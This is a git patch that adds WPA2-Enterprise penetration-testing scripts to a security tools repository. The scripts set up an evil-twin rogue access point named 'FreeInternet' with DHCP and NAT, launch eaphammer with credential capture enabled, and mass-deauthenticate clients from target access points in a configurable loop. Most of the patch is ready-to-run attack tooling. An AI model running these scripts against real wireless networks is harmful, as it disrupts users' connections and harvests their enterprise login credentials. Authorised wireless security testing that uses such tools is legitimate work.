From cc5ba845329490ba52ba8fd390c5d12aa27d5bc6 Mon Sep 17 00:00:00 2001 From: Mariusz B Date: Fri, 9 Feb 2018 17:47:25 +0100 Subject: [PATCH] Added couple of WPA2-Enterprise utilities. --- networks/README.md | 2 + networks/wpa2-enterprise-utils/README.md | 12 +++ networks/wpa2-enterprise-utils/config.txt | 14 +++ .../wpa2-enterprise-utils/initDHCPServer.sh | 40 ++++++++ networks/wpa2-enterprise-utils/massDeauth.sh | 77 +++++++++++++++ .../wpa2-enterprise-utils/startEAPHammer.sh | 96 +++++++++++++++++++ 6 files changed, 241 insertions(+) create mode 100644 networks/wpa2-enterprise-utils/README.md create mode 100644 networks/wpa2-enterprise-utils/config.txt create mode 100755 networks/wpa2-enterprise-utils/initDHCPServer.sh create mode 100755 networks/wpa2-enterprise-utils/massDeauth.sh create mode 100755 networks/wpa2-enterprise-utils/startEAPHammer.sh diff --git a/networks/README.md b/networks/README.md index d7963f0..1454774 100644 --- a/networks/README.md +++ b/networks/README.md @@ -21,6 +21,8 @@ - **`smtpvrfy.py`** - SMTP VRFY python tool intended to check whether SMTP server is leaking usernames. ([gist](https://gist.github.com/mgeeky/1df141b18082b6f424df98fa6a630435)) +- **`wpa2-enterprise-utils`** - Couple of scripts that became needed/useful during **WPA2-Enterprise** penetration-testing assignment. + - **`VLANHopperDTP.py`** - VLAN Hopping via DTP Trunk (Switch) Spoofing exploit - script automating full VLAN Hopping attack, from DTP detection to VLAN Hop with DHCP lease request ([gist](https://gist.github.com/mgeeky/7ff9bb1dcf8aa093d3a157b3c22432a0)) Sample output: diff --git a/networks/wpa2-enterprise-utils/README.md b/networks/wpa2-enterprise-utils/README.md new file mode 100644 index 0000000..1a0fe8b --- /dev/null +++ b/networks/wpa2-enterprise-utils/README.md @@ -0,0 +1,12 @@ +### WPA2-Enterprise penetration testing utilities + +Here are several utilities that came handy during real-world **WPA2-Enterprise** penetration testing assignments centered round great [eaphammer](https://github.com/s0lst1c3/eaphammer.git) tool. + +- **`config.txt`** - example of configuraion file for `massDeauth.sh` script. + +- **`initDHCPServer.sh`** - This script set's up a DHCP server for Rouge AP / Evil Twin attack purposes, to make the victim actually reach out to the WAN. Nothing fancy, just set of needed commands. Especially handy when used with `startEAPHammer.sh` script. + +- **`massDeauth.sh`** - Simple script intended to perform mass-deauthentication of any associated&authenticated client to the Access-Point. Helpful to actively speed up Rogue AP/Evil Twin attacks in multiple Access-Points within an ESSID environments. In other words, if you have an ESSID set up from many access-points (BSSIDs) - this script will help you deauthenitcate all clients from those APs iteratively. + +- **`startEAPHammer.sh`** - This script launches `eaphammer` tool by s0lst1c3, available from: https://github.com/s0lst1c3/eaphammer.git . The tool is a great way to manage hostapd-wpe server as well as perform additional attacks around the concept. Although when used in penetration testing assignments, the tool may not be as reliable as believed due to various nuances with WLAN interface being blocked, not reloaded, DHCP-forced and so on. This is where this script comes in - it tries to automatize those steps before launching the tool and after. Especially handy when used with companion script called: `initDHCPServer.sh` + diff --git a/networks/wpa2-enterprise-utils/config.txt b/networks/wpa2-enterprise-utils/config.txt new file mode 100644 index 0000000..c4306c3 --- /dev/null +++ b/networks/wpa2-enterprise-utils/config.txt @@ -0,0 +1,14 @@ +# Specify an interface +iface = wlp4s0 + +# Number of deauths +deauths = 3 + +# Retry deauths, 0 - infinity +retry = 3 + +# Here comes a list of APs to attack. The list entry form is following: +# target = +target = test 00:11:22:33:44:55 14 +target = test2 00:11:22:33:44:55 14 +target = test3 00:11:22:33:44:55 14 diff --git a/networks/wpa2-enterprise-utils/initDHCPServer.sh b/networks/wpa2-enterprise-utils/initDHCPServer.sh new file mode 100755 index 0000000..9f266ac --- /dev/null +++ b/networks/wpa2-enterprise-utils/initDHCPServer.sh @@ -0,0 +1,40 @@ +#!/bin/bash + +# +# This script set's up a DHCP server for Rouge AP / Evil Twin +# attack purposes, to make the victim actually reach out to the WAN. +# +# Nothing fancy, just set of needed commands. Especially handy when +# used with `startEAPHammer.sh` script. +# +# Mariusz B. / mgeeky '18, +# + +if [ $# -ne 2 ]; then + echo "Usage: initDhcp.sh " + echo + echo -e "\tinputIface - Interface upon which DHCP leases should be offered." + echo -e "\toutputIfave - Interface offering access to WAN (default gateway)" + exit 1 +fi + +INP=$1 +OUT=$2 + +ifconfig $INP up 10.0.0.1 netmask 255.255.255.0 +sleep 2 + +if [ "$(ps -e | grep dhcpd)" == "" ]; then +echo "[+] Started DHCP server." +dhcpd $INP & +fi + +# Enable NAT +iptables --flush +iptables --table nat --flush +iptables --delete-chain +iptables --table nat --delete-chain +iptables --table nat --append POSTROUTING --out-interface $OUT -j MASQUERADE +iptables --append FORWARD --in-interface $INP -j ACCEPT + +sysctl -w net.ipv4.ip_forward=1 diff --git a/networks/wpa2-enterprise-utils/massDeauth.sh b/networks/wpa2-enterprise-utils/massDeauth.sh new file mode 100755 index 0000000..306f1de --- /dev/null +++ b/networks/wpa2-enterprise-utils/massDeauth.sh @@ -0,0 +1,77 @@ +#!/bin/bash + +# +# Simple script intended to perform mass-deauthentication of +# any associated&authenticated client to the Access-Point. +# Helpful to actively speed up Rogue AP/Evil Twin attacks in +# multiple Access-Points within an ESSID environments. +# +# In other words, if you have an ESSID set up from many +# access-points (BSSIDs) - this script will help you +# deauthenitcate all clients from those APs iteratively. +# +# Expected config file must obey the following format: +# ----------------------------------------------- +# # Specify an interface +# iface = wlp4s0 +# +# # Number of deauths +# deauths = 3 +# +# # Retry deauths, 0 - infinity +# retry = 3 +# +# # Here comes a list of APs to attack. The list entry form is following: +# # target = +# target = test 00:11:22:33:44:55 14 +# target = test2 00:11:22:33:44:55 14 +# target = test3 00:11:22:33:44:55 14 +# ----------------------------------------------- +# +# Mariusz B. / mgeeky '18, +# + +if [ $# -ne 1 ]; then + echo "Usage: ./massDeauth " + exit 1 +fi + +function deauthClients { + echo -e "\tDeauthing clients in AP: $essid / $bssid, $ch" + iface=$1 + essid=$2 + bssid=$3 + ch=$4 + deauths=$5 + + airmon-ng stop $iface @> /dev/null + + echo -e "\t[1] Starting monitor on channel $ch" + airmon-ng start $iface $ch @> /dev/null + + echo -e "\t[2] Deauthing $deauths number of times..." + aireplay-ng --deauth $deauths -a $essid $iface +} + +config=$(cat $1 | grep -vE '^#') +retry=$(echo "$config" | grep retry | cut -d= -f2 | cut -d' ' -f2-) +deauths=$(echo "$config" | grep deauths | cut -d= -f2 | cut -d' ' -f2-) +iface=$(echo "$config" | grep iface | cut -d= -f2 | cut -d' ' -f2-) + +echo "Using interface: $iface" + +IFS=$'\n' +if [ $retry -eq 0 ]; then + retry=99999999 +fi + +for i in $(seq 0 $retry); do + echo -e "\n[$i] Deauthing clients..." + for line in $(echo "$config" | grep 'target' | cut -d= -f2 | cut -d' ' -f2-); do + essid=$(echo "$line" | awk '{print $1}') + bssid=$(echo "$line" | awk '{print $2}') + ch=$(echo "$line" | awk '{print $3}') + + deauthClients $iface $essid $bssid $ch $deauths + done +done diff --git a/networks/wpa2-enterprise-utils/startEAPHammer.sh b/networks/wpa2-enterprise-utils/startEAPHammer.sh new file mode 100755 index 0000000..8eaa7b1 --- /dev/null +++ b/networks/wpa2-enterprise-utils/startEAPHammer.sh @@ -0,0 +1,96 @@ +#!/bin/bash + +# +# This script launches `eaphammer` tool by s0lst1c3, available from: +# https://github.com/s0lst1c3/eaphammer.git +# +# The tool is a great way to manage hostapd-wpe server as well as perform +# additional attacks around the concept. Although when used in penetration +# testing assignments, the tool may not be as reliable as believed due to +# various nuances with WLAN interface being blocked, not reloaded, +# DHCP-forced and so on. This is where this script comes in - it tries to +# automatize those steps before launching the tool and after. +# +# Especially handy when used with companion script called: +# `initDHCPServer.sh` +# +# Mariusz B. / mgeeky '18, +# + +#################################################################### +# CONFIGURATION + +# Name of offered Fake/Rouge AP +ESSID=FreeInternet + +# MAC Address of Fake/Rouge AP +BSSID=24:01:c7:31:13:37 + +# Channel +CH=10 + +# Additional `eaphammer` options to pass. +EAPHAMMER_OPTS="--creds --wpa 2 --auth ttls" + +# Wireless interface to use for Rogue/Fake AP purposes. +WLAN_IFACE=wlan0 + +# [optional] Outbound to WAN interface (default gateway) where to pass victim's +# internet connection. If not specified, there will be no IP forwarding set. +OUTBOUND_IFACE= + +# Directory in which `eaphammer` has been installed/cloned. +EAPHAMMER_DIR=/root/tools/eaphammer + +# [optional] Directory with this very script. Needed to find `initDHCPServer.sh` companion +# script. If not specified, will try to use this script's current working directory. +THIS_SCRIPT_DIR=/root/vmshared/wifiPentest + +#################################################################### + + +echo "[STEP 0]: Preliminary cleanup" +pkill dhclient +pkill dhcpd + +echo "[STEP 1]: nl802111 driver Bug workaround" +nmcli radio wifi off +rfkill unblock wlan + +echo "[STEP 2]: Reloading wireless interface" +ifconfig $WLAN_IFACE down +ifconfig $WLAN_IFACE up +sleep 2 + +echo "[STEP 3]: Reloading outbound interface." +if [ -n "$OUTBOUND_IFACE" ]; then + dhclient -r $OUTBOUND_IFACE + dhclient -v $OUTBOUND_IFACE 2>&1 | grep 'bound to' +else + echo "No outbound interface specified. Skipping step..." +fi + +echo "[STEP 4]: Starting DHCP launch script in background" +if [ -n "$OUTBOUND_IFACE" ]; then + if [ -z "$THIS_SCRIPT_DIR" ]; then + THIS_SCRIPT_DIR="$( cd "$(dirname "{BASH_SOURCE[0]}" )" && pwd)" + fi + eval "$THIS_SCRIPT_DIR/initDHCPServer.sh $WLAN_IFACE $OUTBOUND_IFACE" &disown; +else + echo "No outbound interface specified. Skipping step..." +fi + +pushd $EAPHAMMER_DIR > /dev/null +echo "[STEP 5]: Starting eaphammer with options: '$EAPHAMMER_OPTS'" + +#################################################################### + +./eaphammer -i $WLAN_IFACE -e $ESSID -b $BSSID -c $CH $EAPHAMMER_OPTS + +#################################################################### + +popd > /dev/null + +echo "[STEP 6]: Killing services." +pkill dhclient +pkill dhcpd